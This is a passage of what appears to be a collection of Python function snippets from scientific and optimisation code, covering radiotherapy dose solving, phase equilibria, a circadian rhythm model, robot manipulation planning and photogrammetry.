magnification)\n\n\n self._alignmentTransX[iproj] = tx\n self._alignmentTransY[iproj] = ty\n\n\n\n # print(self.irefmark, self._alignmentTransX[self.ireftilt], self._alignmentTransY[self.ireftilt])\n # for itilt in range(ntilt):\n # self.q[itilt] = optimizableVariables[ivar]\n # ivar += 1", "def solver_auto_param(u_init, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, eta_step = 0.5, eta_step_tumor = 0.99, ftol = 1e-3, max_iter = 300, verbose = 0, nnls_max_iter=30):\n auto_param_obj_history = []\n auto_param_relaxed_obj_history = []\n \n eta_0 = (1/(2*np.max(B)))*0.5 #Initialize eta_0\n eta = np.array([eta_0/len(H)]*len(H))*0.9\n eta_lin = np.ones(L_lhs.shape[0])*0.01\n \n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u_init, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose, nnls_max_iter=nnls_max_iter)\n # solver(u_init, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = 1e-3, max_iter = 300, verbose = verbose)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n \n print('Enforcing Feasibility')\n count = 0\n num_violated = -1\n while (len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear))):\n count += 1\n num_violated_prev = np.copy(num_violated)\n num_violated_oar = len(H) - cnstr['Relaxed'].sum()\n num_violated_lin = L_lhs.shape[0] - np.sum(cnstr_linear)#(1 - int(cnstr_linear))\n num_violated = len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear))#(1 - int(cnstr_linear))\n \n print('Iter ', count, '# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))\n print(' Linear constraints on u violation:', L_lhs.shape[0] - np.sum(cnstr_linear))\n eta[cnstr['Relaxed'] == False] *= eta_step\n eta_lin[cnstr_linear == False] *= eta_step\n # eta_0 *= eta_step*2\n # eta_lin *= eta_step\n \n if num_violated == num_violated_prev:\n print('Increase enforcement')\n if num_violated_lin > 0:\n eta_lin[cnstr_linear == False] *= eta_step\n # eta_0 *= eta_step*2\n #eta_lin *= eta_step\n if num_violated_oar > 0:\n eta[cnstr['Relaxed'] == False] *= eta_step\n # eta_0 *= eta_step*2\n \n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose, nnls_max_iter=nnls_max_iter)\n # solver(u, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n \n print('Enforcing Optimality')\n count = 0\n while not (len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear))):\n # (cnstr['Relaxed'].sum()-len(H)): #If nothing is violated -- enforce optimality!\n count += 1\n print('Opt Iter', count)\n obj_prev = obj_u_opt_N_fixed(u, T, alpha, B)\n u_prev = np.copy(u)\n eta_0 *= eta_step_tumor\n print('Current eta_0:', eta_0)\n if (2*eta_0)**2 <= 1e-80:\n print('zero reached')\n break\n # u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, T, H, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter, verbose = verbose)\n u, w_0, w, w_lin, obj_history, relaxed_obj_history = solver(u, eta_0, eta, eta_lin, T, H, L_lhs, L_rhs, alpha, gamma, B, D, C, ftol = ftol, max_iter = max_iter//2, verbose = verbose, nnls_max_iter=nnls_max_iter)\n auto_param_obj_history.append(obj_history)\n auto_param_relaxed_obj_history.append(relaxed_obj_history)\n \n obj_new = obj_u_opt_N_fixed(u, T, alpha, B)\n if (abs(obj_new - obj_prev)/abs(obj_prev) <= 1e-4) or (obj_new > obj_prev): #two consequent iters, two times bc on iter 2 it stops anyway\n print('No improvement, increase enforcement')\n eta_step_tumor *= 0.1\n eta_0 *= eta_step_tumor\n if (2*eta_0)**2 <= 1e-80:\n print('zero reached')\n break\n # break\n \n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n print('# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))#(1 - int(cnstr_linear)))\n \n print('Finding the correct solution:')\n u = u_prev\n eta_0 = eta_0/eta_step_tumor\n \n cnstr = constraints_all(u, H, gamma, D, C, tol = 0.05, verbose = 0)\n cnstr_linear = linear_constraint(u, L_lhs, L_rhs, tol = 0.05)\n print('# of violated constr:', len(H) - cnstr['Relaxed'].sum() + (L_lhs.shape[0] - np.sum(cnstr_linear)))\n # print('# of violated constr:', cnstr['Relaxed'].sum()-len(H))\n print(\"OBJJJJJ:\", obj_u_opt_N_fixed(u, T, alpha, B))\n return u, w_0, w, w_lin, eta_0, eta, eta_lin, auto_param_obj_history, auto_param_relaxed_obj_history", "def _init_optimizer_params(self):\n order = [\n [Peaking.__name__, True, True], # Peaking\n [LowShelf.__name__, True, True], # Low shelfs\n [HighShelf.__name__, True, True], # High shelfs\n [Peaking.__name__, True, False], # Peaking with fixed q\n [LowShelf.__name__, True, False], # Low shelfs with fixed q\n [HighShelf.__name__, True, False], # High shelfs with fixed q\n [Peaking.__name__, False, True], # Peaking with fixed fc\n [LowShelf.__name__, False, True], # Low shelfs with fixed fc\n [HighShelf.__name__, False, True], # High shelfs with fixed fc\n [Peaking.__name__, False, False], # Peaking with fixed fc and q\n [LowShelf.__name__, False, False], # Low shelfs with fixed fc and q\n [HighShelf.__name__, False, False], # High shelfs with fixed fc and q\n ]\n\n def init_order(filter_ix):\n filt = self.filters[filter_ix]\n ix = order.index([filt.__class__.__name__, filt.optimize_fc, filt.optimize_q])\n val = ix * 100\n if filt.optimize_fc:\n val += 1 / np.log2(filt.max_fc / filt.min_fc)\n return val\n\n # Initialize filter params as list of empty lists, one per filter\n filter_params = [[]] * len(self.filters)\n # Indexes to self.filters sorted by filter init order\n filter_argsort = sorted(list(range(len(self.filters))), key=init_order, reverse=True)\n remaining_target = self.target.copy()\n for ix in filter_argsort: # Iterate sorted filter indexes\n filt = self.filters[ix] # Get filter\n filter_params[ix] = filt.init(remaining_target) # Init filter and place params to list of lists\n remaining_target -= filt.fr # Adjust target\n filter_params = np.concatenate(filter_params).flatten() # Flatten params list\n return filter_params", "def phase_equilibrium_calculation(s, p, g_x_func, Z_0, k=None, P=None, T=None, \n tol=1e-9, Print_Results=False, Plot_Results=False):\n # Calculate first minimizer\n from tgo import tgo\n if True: # Print time\n import timeit\n A = timeit.time.time()\n \n s.update_state(s, p, P=P, T=T, X = Z_0, Force_Update=True) \n s = dual_equal(s, p, g_x_func, Z_0 , tol=tol)\n X_I = s.m['Z_eq']\n Lambda_d = s.m['Lambda_d']\n \n # Find phase of eq. point I\n s.update_state(s, p, X = X_I, Force_Update=True) \n s.m['Phase eq. I'] = g_x_func(s, p).m['g_mix']['ph min']\n\n # Calculate second minimizer\n Bounds = []\n for i in range(len(Z_0)):\n if Z_0[i] <= X_I[i]:\n Bounds.append((1e-6, Z_0[i]))\n if Z_0[i] > X_I[i]:\n Bounds.append((Z_0[i], 0.99999))\n\n # Calculate second point from redifined gobal func. \n Args = (g_x_func, Lambda_d, X_I, s, p, ['All'])\n print Bounds\n X_II = tgo(eq_sol, Bounds, args=Args, n=100, k_t = 5)\n \n # Find phase of eq. point II\n s.update_state(s, p, X = X_II, Force_Update=True) \n s.m['Phase eq. II'] = g_x_func(s, p).m['g_mix']['ph min']\n \n \n if True: \n B = timeit.time.time()\n print 'Total calculation time = {}'.format(B - A)\n \n if Print_Results:\n print 'EQUILIBRIUM SOLUTIONS I: {} (phase = {})'.format(X_I, \n s.m['Phase eq. I'])\n print ' II: {} (phase = {})'.format(X_II, \n s.m['Phase eq. II']) \n \n if Plot_Results:\n Z_0 = s.m['Z_eq']\n\n # Gibbs mix func with Tie lines\n from scipy import linspace\n print 'Feeding Lamda_d = {} to ep. func.'.format(s.m['Lambda_d'])\n print [[X_II, X_I]]\n if p.m['n'] == 2: # Plot binary tie lines\n plot.plot_g_mix(s, p, g_x_func, Tie =[[X_II, X_I]], x_r=1000)\n \n if p.m['n'] == 3: # Plot ternary tie lines\n s.update_state(s, p, P=P, T=T, X = X_I, Force_Update=True) \n G_P = g_x_func(s, p).m['g_mix']['t']\n print G_P\n Tie = [[G_P,# -0.3247905329, # G_P # TODO\n X_I[0], # x_1\n s.m['Lambda_d'][0], # lambda_1\n X_I[1], # x_2\n s.m['Lambda_d'][1]] # lambda_2\n ] \n s.m['Lambda_d']\n plot.plot_g_mix(s, p, g_x_func, Tie = Tie, x_r=100)\n \n # Error func\n s.m['Lambda_d'] = Lambda_d \n s.m['Z_eq'] = X_I\n X_r = linspace(1e-5, 0.9999, 1000) \n plot.plot_ep(eq_sol, X_r, s, p, args=Args)\n\n # Save returns in state dictionary.\n s.m['X_I'] = X_I\n s.m['X_II'] = X_II\n \n return s", "def construct_equilibrium(params,par_dict,K_RC,K_CP,m_P):\n #intrapopulation parameters\n q1=par_dict['q1']\n q2=par_dict['q2']\n q1_0 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n \n K=par_dict['K']\n r=par_dict['r']\n \n m_C = K_CP*m_P\n\n #interpopulation parameters\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n # Equilibrium values\n ##Sc2\n ###L-V\n R_eq_s2 , C_eq_s2 = set_R_C_eq_sLV(r,K,q1,a1,e1)\n ###R-M\n R_eq_s2RM, C_eq_s2RM = set_R_C_eq_sRM(r,K,q1,q1_0,a1,e1,hC0)\n ##Sc3\n ###L-V\n R_eq_s3,P_eq_s3 = set_R_C_eq_sLV(r,K,q2,a2,e2)\n ###R-M\n R_eq_s3RM , P_eq_s3RM = set_R_C_eq_sRM(r,K,q2,q20,a2,e2,hP0)\n \n\n ###full system ( need to correct this.. in case want to use it, focus at the moment in invasibility stuff)\n R_eq = set_R_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n C_eq = set_C_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n P_eq = set_P_eq(K,q1,q2,r,a1,a2,a3,e1,e2,e3)\n \n D = setD(K,a1,a2,a3,e1,e2,e3,r)\n DBound= setDBound(K,a1,a2,a3,e1,e2,e3,m_C,r)\n\n #Roots for Req\n R1 = setRoot1(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n Dis = setDis(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n bR = setb_R(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n denR = setden_R(K,q1,q2,r,a1,a2,a3,e1,e2,e3,t_hc,t_hp,m_P,m_C,q20,q1_0,hC0,hP0)\n\n R2 = (bR + sqrt(Dis))/(2*denR)\n R3 = (bR - sqrt(Dis))/(2*denR)\n \n eq_dict={'R_eq_s2':R_eq_s2,'C_eq_s2':C_eq_s2,'R_eq_s3':R_eq_s3,'P_eq_s3':P_eq_s3,'R_eq':R_eq,'C_eq':C_eq,'P_eq':P_eq,\n 'R_eq_s2RM':R_eq_s2RM,'C_eq_s2RM':C_eq_s2RM,'R_eq_s3RM':R_eq_s3RM,'P_eq_s3RM':P_eq_s3RM,'R1':R1,'Discriminant':Dis,'R2':R2,'R3':R3,'bR':bR,'denR':denR,'D' : D,'DBound':DBound}\n return eq_dict", "def Optimizer(r_grasp,PAM_r, PAM_s, object_s, object_f, object_params, phi, r_max, walls, obstacles, obstacles_PAM, current_leg, n, n_p, v_max, force_max, legs, dt):\n global action_push_pull, PAM_goal, grasping_goal, object_path_planned, PAM_path_planned\n # assigning cost of changing from one leg to another based on the distance to the desired pose\n cost_ChangeLeg = 1\n dz_final = np.sqrt((object_s.x - object_f.x) ** 2 + (object_s.y - object_f.y) ** 2)\n if dz_final < 1:\n cost_ChangeLeg = 10\n elif dz_final < 2:\n cost_ChangeLeg = 20\n else:\n cost_ChangeLeg = 10\n\n # assigning weight for cost of predicted repositioning and cost of robot motion\n w_cost_reposition = 40\n w_cost_motion = 10\n\n # finding object's leg cordinates\n object_leg = find_corners(object_s.x, object_s.y, object_s.phi, object_params[7], object_params[8])\n\n # initialization (initializeing cost to infinity)\n cost = [float('inf'), float('inf'), float('inf'), float('inf')]\n cost_legchange = [0, 0, 0, 0]\n cost_PAM = [[0, 0],[0, 0],[0, 0],[0, 0]]\n cost_manipulation = [0, 0, 0, 0]\n cost_motion = [0, 0, 0, 0]\n force = [0, 0, 0, 0]\n path = [[[], []], [[], []], [[], []], [[], []]]\n planned_path_w = [[],[],[],[]]\n PAM_g = [[[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]], [[0, 0, 0], [0, 0, 0]]]\n command = [[], [], [], []]\n des = [[], [], [], [], []]\n PAM_goal = state()\n\n # find the nominal trajectory for manipulation\n theta = nominal_traj([object_s.x,object_s.y,object_s.phi], [object_f.x,object_f.y,object_f.phi], v_max, walls, obstacles, n, dt)\n\n # itterate through each leg to find the leg with minimum cost\n for leg in range(4):\n phi_linear = theta\n psi_linear = [theta[k] + phi[leg] for k in range(len(theta))]\n \t# find the cost and required force for manipulation for the leg\n force[leg], cost_manipulation[leg], planned_path_w[leg], command[leg], des= OptTraj([object_s.x, object_s.y, object_s.phi, object_s.xdot, object_s.ydot, object_s.phidot], [object_f.x, object_f.y, object_f.phi, object_f.xdot, object_f.ydot, object_f.phidot], v_max, walls, obstacles, object_params[0:4], object_params[4:7], phi_linear, psi_linear, force_max, r_max[leg], n, dt, object_leg[leg])\n \t# adding cost of changing leg\n if leg != current_leg:\n cost_legchange[leg] = cost_ChangeLeg\n # adding cost of PAM motion to PAM goal pose\n phi0 = np.arctan2(object_leg[leg][1]-object_s.y,object_leg[leg][0]-object_s.x)\n # finding the better option between pulling and pushing for each leg, with the same manipulation plan\n for push_pull in [0,1]:\n PAM_g[leg][push_pull] = [r_grasp * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], r_grasp * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n cost_PAM[leg][push_pull], path[leg][push_pull], command_pam, goal_orientation = OptPath([PAM_s.x, PAM_s.y, PAM_s.phi], PAM_g[leg][push_pull], walls, obstacles_PAM, n_p, dt)\n if cost_PAM[leg][push_pull]!= float(\"inf\"):\n PAM_s_sim = copy.deepcopy(PAM_s)\n PAM_s_sim.x, PAM_s_sim.y, PAM_s_sim.phi = [PAM_r * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], PAM_r * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n # adding cost of predicted re-positionings\n n_transition = traj_simulation(copy.deepcopy(PAM_s_sim), copy.deepcopy(object_s), force[leg], legs, leg, command[leg])\n # print(n_transition)\n cost_PAM[leg][push_pull] += w_cost_reposition*n_transition\n cost_motion[leg] += min(cost_PAM[leg])*w_cost_motion\n action_push_pull[leg] = np.argmin(cost_PAM[leg])\n else:\n phi0 = np.arctan2(force[leg][0][1], force[leg][0][0])\n for push_pull in [0,1]:\n PAM_g[leg][push_pull] = [r_grasp * np.cos(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][0], r_grasp * np.sin(phi0) * np.sign(push_pull * 2 - 1) + object_leg[leg][1], np.pi * push_pull + phi0]\n cost = [cost_legchange[leg] + cost_motion[leg] + cost_manipulation[leg] for leg in range(4)]\n\n if min(cost) < float(\"inf\"):\n \t[min_index, min_value] = [np.argmin(cost), min(cost)]\n \t# Finding the grasping goal pose based on the selected plan\n \tphi0 = np.arctan2(object_leg[min_index][1]-object_s.y,object_leg[min_index][0]-object_s.x)\n \tgrasping_goal = [PAM_r * np.cos(phi0) * np.sign(action_push_pull[min_index] * 2 - 1) + object_leg[min_index][0], PAM_r * np.sin(phi0) * np.sign(action_push_pull[min_index] * 2 - 1) + object_leg[min_index][1], np.pi * action_push_pull[min_index] + phi0]\n \tPAM_goal = state()\n \tPAM_goal.x, PAM_goal.y, PAM_goal.phi = PAM_g[min_index][action_push_pull[min_index]]\n \tobject_path_planned = Path()\n \tobject_path_planned.header.frame_id = 'frame_0'\n \tfor i in range(len(planned_path_w[min_index])):\n \t\tpose = PoseStamped()\n \t\tpose.pose.position.x = planned_path_w[min_index][i][0]\n \t\tpose.pose.position.y = planned_path_w[min_index][i][1]\n \t\tpose.pose.position.z = 0\n \t\tobject_path_planned.poses.append(pose)\n\n \tPAM_path_planned = Path()\n \tPAM_path_planned.header.frame_id = 'frame_0'\n \tif min_index != current_leg:\n \t\tfor i in range(len(path[min_index][action_push_pull[min_index]])):\n \t\t\tpose = PoseStamped()\n \t\t\tpose.pose.position.x, pose.pose.position.y, pose.pose.orientation.z =path[min_index][action_push_pull[min_index]][i]\n \t\t\tPAM_path_planned.poses.append(pose)\n else:\n \tmin_index = 5\n \tmin_value = float(\"inf\")\n if 0 < min_index and min_index <= 4:\n force_d = force[min_index][0]\n else:\n force_d = [0,0,0]\n\n return cost ,min_index, force_d, PAM_goal, grasping_goal, object_path_planned, PAM_path_planned", "def _core_fix_params(self,bx,phase,eqnid) :\n\t\tif self.ss.exptype == 'fullinfo' :\n\t\t\treturn bx\n\t\telif self.ss.exptype in ('noinfo','partialinfo') :\n\t\t\treg_fix = self._regressors_fix[eqnid] \n\t\t\tif phase == 1 : \n\t\t\t\tprod_fix = reg_fix['prod']\n\t\t\t\tfor varid in prod_fix : \n\t\t\t\t\tbx[varid] = 0.0\n\t\t\telif phase == 2 : \t\t\t\n\t\t\t\tdegrad_fix = reg_fix['degrad']\n\t\t\t\tfor varid in degrad_fix :\n\t\t\t\t\tbx[varid] = 0.0 \n\t\t\telse : \n\t\t\t\tself.logger.error(\"Incorrect phase %r\"%(phase))\n\t\t\t\tsys.exit(1)\n\t\telse :\n\t\t\tself.logger.error(\"Unrecognized exptype %s quitting...\"%\\\n\t\t\t(self.ss.exptype))\n\n\t\treturn bx", "def optimize(self, iterations=1000):\r\n prev = None\r\n finalx = None\r\n finaly = None\r\n while iterations:\r\n maxei, eis = self.acquisition()\r\n new_y = self.f(maxei)\r\n if maxei == prev:\r\n break\r\n self.gp.update(maxei, new_y)\r\n pycodehack = finaly is None or self.minimize and finaly > new_y\r\n if ((pycodehack or not self.minimize and finaly < new_y)):\r\n finaly = new_y\r\n finalx = maxei\r\n prev = maxei\r\n iterations -= 1\r\n return finalx, finaly", "def CircadianRythme(t,initial_conditions) :\n#-----------------------\n# PARAMETERS IMPORTATION\n#-----------------------\n\tfichier = 'param.csv'\n\tparam = readparam(fichier, 1)\n\n#-----------------------\n# Initial conditions : \n#-----------------------\n\n\t# mRNAs of per, Cry and Bmal : \n\tMp = initial_conditions[0]\n\tMc = initial_conditions [1]\n\tMb = initial_conditions[2]\n\n\t# Phosporylated and non-phosphorylated proteins PER\n\t# and Cry in the cytosol : \n\n\tPc = initial_conditions[3]\n\tCc = initial_conditions[4]\n\tPcp = initial_conditions[5]\n\tCcp = initial_conditions[6]\n\n\t# Phosporylated and non-phosphorylated PER- Cry complexe\n\t# in the cytosol and nucleus : \n\n\tPCc = initial_conditions[7]\n\tPcn = initial_conditions[8]\n\tPCcp = initial_conditions[9]\n\tPCnp = initial_conditions[10]\n\n\t# Phosphorylated and non-phosphorylated protein BMAL1 in\n\t# the cytosol and nucleus : \n\n\tBc = initial_conditions[11]\n\tBcp = initial_conditions[12]\n\tBn = initial_conditions[13]\n\tBnp = initial_conditions[14]\n\n\t# Inactive complex between PER-CRY and CLOCK-BMAL1 in \n\t# nucleus : \n\n\tIn = initial_conditions[15]\n\n#--------------\n# Parameters : \n#--------------\n\n\n\t# Rate constants for modification : \n\n\tk1 = param['k1']\n\tk2 = param['k2']\n\tk3 = param['k3']\n\tk4 = param['k4']\n\tk5 = param['k5']\n\tk6 = param['k6']\n\tk7 = param['k7']\n\tk8 = param['k8']\n\n\t# Activation constant\n\n\tKAP = param['KAP']\n\tKAC = param['KAC']\n\tKIB = param['KIB']\n\n\t#Nonspecific degradation rate constant\n\n\tkdmb = param['kdmb']\n\tkdmc = param['kdmc']\n\tkdmp = param['kdmp']\n\tkdnc = param['kdnc']\n\tkdn = param['kdn']\n\n\t# Michaelis constant : \n\n\tKd = param['Kd']\n\tKdp = param['Kdp']\n\tKp = param['Kp']\n\tKmB = param['KmB']\n\tKmC = param['KmC']\n\tKmP = param['KmP']\n\n\t#Rate constant for synthesis : \n\n\tkstot = param['kstot']\n\tksB = param['ksB']\n\tksC = param['ksC']\n\tksP = param['ksP']\n\n\t# Degree of cooperativity : \n\n\tn = param['n']\n\tm = param['m']\n\n\t#Phosphorylation rate : \n\n\tVphos = param['Vphos']\n\t#Maximum Rate : \n\n\tV1B = param['V1B']\n\tV1C = param['V1C']\n\tV1P = param['V1P']\n\tV1PC = param['V1PC']\n\tV2B = param['V2B']\n\tV2C = param['V2C']\n\tV2P = param['V2P']\n\tV2PC = param['V2PC']\n\tV3B = param['V3B']\n\tV3PC = param['V3PC']\n\tV4B = param['V4B']\n\tV4PC = param['V4PC']\n\n\t#Maximum rate of degradation\n\n\tvndBC = param['vndBC']\n\tvndBN = param['vndBN']\n\tvndCC = param['vndCC']\n\tvndIN = param['vndIN']\n\tvndPC = param['vndPC']\n\tvndPCC = param['vndPCC']\n\tvndPCN = param['vndPCN']\n\tvnmB = param['vnmB']\n\tvnmC = param['vnmC']\n\tvnmP = param['vnmP']\n\n\t# Maximum rate of synthesis/transcription : \n\n\tvnsTot = param['vnsTot']\n\tvnsB = param['vnsB']\n\tvnsC = param['vnsC']\n\tvnsP = param['vnsP']\n\n#--------------------------\n# Kinetic equations : \n#--------------------------\n\n\t# mRNAs of per, Cry and Bmal : \n\n\tdMp = vnsP * Bn**n/(KAP**n+Bn**n) - vnmP * Mp/(KmP+Mp) - kdmp*Mp\n\tdMc = vnsC * Bn**n/(KAC**n+Bn**n) - vnmC * Mc/(KmC + Mc) - kdmc*Mc\n\tdMb = vnsB * KIB**m/(KIB**m+Bn**m) - vnmB * Mb/(KmB + Mb) - kdmb*Mb\n\n\t#Phosphorylated and non-phosphorylated proteins PER and CRY in the cytosol : \n\n\tdPc = ksP * Mp - V1P*Pc/(Kp+Pc) + V2P * Pcp/(Kdp + Pcp) + k4 * PCc - k3 * Pc * Cc - kdn * Pc\n\tdCc = ksC * Mc - V1C * Cc / (Kp +Cc) + V2C * Ccp/(Kdp + Ccp) + k4 * PCc - k3 * Pc * Cc - kdnc * Cc\n\tdPcp = V1P * Pc/(Kp + Pc) - V2P * Pcp/(Kdp + Pcp) - vndPC * Pcp/(Kp+Pcp) - kdn * Pcp\n\tdCcp = V1C * Cc/(Kp+Cc) - V2C * Ccp/(Kdp + Ccp) - vndCC * Ccp/(Kd + Ccp) - kdn * Ccp\n\n\t# Phosphorylated and non-phosphorylated PER-CRY complex in cytosom and nucleus : \n\n\tdPCc = -V1PC * PCc/(Kp+PCc) + V2PC * PCcp/(Kdp + PCcp) - k4 * PCc + k3 * Pc * Cc + k2 * Pcn - k1 * PCc - kdn * PCc \n\tdPCn = -V3PC * Pcn/(Kp+Pcn) + V4PC * PCnp/(Kdp+PCnp) - k2*Pcn + k1*PCc - k7 * Bn * Pcn + k8 * In - kdn * Pcn\n\tdPCcp = V1PC * PCc/(Kp+PCc) - V2PC * PCcp/(Kdp + PCcp) - vndPCC * PCcp/(Kd + PCcp) - kdn * PCcp\n\tdPCnp = V3PC * Pcn/(Kp+Pcn) - V4PC * PCnp/(Kdp + PCnp) - vndPCN * PCnp/(Kd + PCnp) - kdn * PCnp\n\n\t# Phosphorylated and non-phosphorylated protein BMAL1 in the cytosol and nucleus\n\tdBc = KIB * Mb - V1B * Bc/(Kp+Bc) + V2B * Bcp/(Kdp + Bcp) - k5*Bc + k6*Bc - kdn*Bc\n\tdBcp = V1B * Bc/(Kp + Bc) - V2B * Bcp/(Kdp + Bcp) - vndBC * Bcp/(Kd + Bcp) - kdn*Bcp\n\tdBn = -V3B * Bn/(Kp+Bn) - V4B * Bnp/(Kdp+Bnp) + k5*Bc - k6 * Bn - k7 * Bn * Pcn + k8 * In - kdn*Bn\n\tdBnp = V3B*Bn/(Kp+Bn) - V4B * Bnp/(Kdp + Bnp) - vndBN * Bnp/(Kd + Bnp) - kdn * Bnp\n\n\t#Inactive complex between PER–CRY and CLOCK–BMAL1 in nucleus :\n\tdIn = -k8 * In + k7 * Bn * Pcn -vndIN * In/(Kd + In) - kdn*In\n\t\n\tdydt = np.array([dMp, dMc, dMb, dPc, dCc, dPcp, dCcp, dPCc, dPCn, dPCcp, dPCnp, dBc, dBcp, dBn, dBnp, dIn])\n\treturn dydt.reshape(len(dydt),1)", "def __ComputeApproximateVals(self, cameraPoints, groundPoints):\n\n # Find approximate values\n cameraPoints = cameraPoints.reshape(np.size(cameraPoints), 1)\n groundPointsXY = groundPoints[0:2, :].T\n groundPointsXY = groundPointsXY.reshape(np.size(groundPointsXY), 1)\n groundPointsZ = groundPoints[2, :].T\n\n n = int(len(cameraPoints)) # number of observations\n u = 4 # 4 conform parameters\n\n A = np.zeros((n, u)) # A matrix (n,u)\n\n j = 0\n for i in range(len(cameraPoints)):\n if i % 2 == 0:\n A[i, 0] = 1\n A[i, 1] = 0\n A[i, 2] = cameraPoints[j]\n A[i, 3] = cameraPoints[j + 1]\n else:\n A[i, 0] = 0\n A[i, 1] = 1\n A[i, 2] = cameraPoints[j + 1]\n A[i, 3] = -cameraPoints[j]\n j += 2\n\n X = np.dot(la.inv(np.dot(np.transpose(A), A)), np.dot(np.transpose(A), groundPointsXY))\n\n # now we can compute the rest of the params\n X0 = X[0]\n Y0 = X[1]\n kappa = np.arctan2(-X[3], X[2])\n lam = np.sqrt(X[2] ** 2 + X[3] ** 2)\n Z0 = np.average(groundPointsZ) + (lam) * self.camera.focalLength\n\n adjustment_results = {\"X0\": X0[0], \"Y0\": Y0[0], \"Z0\": Z0[0], \"omega\": 0, \"phi\": 0,\n \"kappa\": np.rad2deg(kappa[0])}\n\n self.__exteriorOrientationParameters = np.array(\n [X0[0], Y0[0], Z0[0], 0, 0, kappa[0]]).T # updating the exterior orientation params\n # self.__exteriorOrientationParameters = np.array([202225, 742447, 657.81, 0, 0, kappa[0]]).T\n #return adjustment_results", "def updateW(self, trj_Sp_theta, W_0):\n def fun(x):\n global trj_Sp_theta_z\n #W_0 = [[x[0], x[1]], [x[2], x[3]], [x[4], x[5]], [x[6], x[7]]] # sin cos\n W_0 = [[x[0], x[1]],[x[2], x[3]]] # with dir\n #W_0 = x\n r_0 = self.reward_trj(trj_Sp_theta, W_0) \n return -1*r_0 \n import numpy as np\n from scipy.optimize import minimize\n \n global trj_Sp_theta_z \n trj_Sp_theta_z = trj_Sp_theta\n alpha = 0.005\n alpha = 0.1\n delta = alpha\n cons = ({'type': 'eq',\n 'fun' : lambda x: np.array([np.sum(x)-1])},\n {'type': 'ineq',\n 'fun' : lambda x: np.array([np.min(x)])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[0]-x0[0])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[1]-x0[1])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[2]-x0[2])+delta])}, # greater than zero\n {'type': 'ineq',\n 'fun' : lambda x: np.array([-np.abs(x[3]-x0[3])+delta])}) # greater than zero\n\n #x0 = W_0\n x0 = [W_0[0][0], W_0[0][1], W_0[1][0], W_0[1][1]] # with dir\n res = minimize(fun, x0, constraints=cons)\n x = res.x\n W = [[x[0], x[1]],[x[2], x[3]]] # with dir\n return W", "def solve(self):\n\n # Open status display\n fmtstr, nsep = self.display_start()\n\n # Start solve timer\n self.timer.start(['solve', 'solve_wo_func', 'solve_wo_rsdl',\n 'solve_wo_btrack'])\n\n # Main optimisation iterations\n for self.k in range(self.k, self.k + self.opt['MaxMainIter']):\n\n # Update record of X and Y from previous iteration\n self.on_iteration_start()\n\n # Compute backtracking\n if self.opt['Backtrack'] is not None and self.k >= 0:\n self.timer.stop('solve_wo_btrack')\n # Compute backtracking\n self.backtrack.update(self)\n self.timer.start('solve_wo_btrack')\n else:\n # Compute just proximal step\n self.xstep()\n # Update by combining previous iterates\n self.ystep()\n\n # Compute residuals and stopping thresholds\n self.timer.stop(['solve_wo_rsdl', 'solve_wo_btrack'])\n if not self.opt['FastSolve']:\n frcxd, adapt_tol = self.compute_residuals()\n self.timer.start('solve_wo_rsdl')\n\n # Compute and record other iteration statistics and\n # display iteration stats if Verbose option enabled\n self.timer.stop(['solve_wo_func', 'solve_wo_rsdl',\n 